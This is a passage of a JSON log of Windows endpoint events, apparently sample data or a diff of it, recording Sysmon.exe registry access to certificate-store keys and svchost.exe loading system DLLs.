"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "netprofm.dll", - "image_path": "C:\\Windows\\System32\\netprofm.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878080000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "npmproxy.dll", - "image_path": "C:\\Windows\\System32\\npmproxy.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878080000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "bitsigd.dll", - "image_path": "C:\\Windows\\System32\\bitsigd.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878080000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "upnp.dll", - "image_path": "C:\\Windows\\System32\\upnp.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878240000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 